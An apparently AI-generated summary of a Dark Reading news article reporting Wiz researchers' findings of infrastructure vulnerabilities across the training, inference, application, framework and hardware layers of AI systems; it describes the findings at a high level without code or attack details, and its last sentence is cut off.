Lessons From AI Hacking: Every Model, Every Layer Is Risky

Dark Reading
by Robert Lemos
February 20, 2026
AI-Generated Deep Dive Summary
Two researchers from Wiz, Hillai Ben Sasson and Dan Segev, spent two years identifying vulnerabilities in AI infrastructure, discovering that nearly every major AI platform they targeted had exploitable flaws. Instead of focusing on prompt injection attacks, which are often a primary concern for security professionals, the researchers emphasized the importance of addressing fundamental infrastructure issues across five distinct layers of the AI stack: training, inference, application, framework, and hardware. The research revealed significant risks in each layer. During model training, data leakage was a major issue, as seen when an overly permissive file-sharing link exposed a 38TB dataset used by Microsoft to train its models. In production environments, vulnerabilities were found in services like DeepSeek and Ollama, while the widely used Pickle format for storing AI models was exploited to execute arbitrary code. Additionally, application layer issues, such as poor security practices in vibe-coding platforms like Base44, could have allowed attackers access to private enterprise applications. The researchers also highlighted that many AI technologies are introduced without proper threat modeling or security considerations, leading to vulnerabilities that could be exploited at scale. Their findings underscore the urgent need for businesses adopting AI to prioritize infrastructure security and adopt a comprehensive threat model when implementing AI systems. This shift in focus from prompt injection to foundational infrastructure flaws is critical as companies rush to adopt AI technologies, often prioritizing speed over security, leaving them vulnerable to significant risks like data breaches and unauthorized access. As businesses increasingly rely on AI for innovation and cost savings, the researchers' work serves as a wake-up call for the importance of securing AI infrastructure at every
Verticals
securitytech
Originally published on Dark Reading on 2/20/2026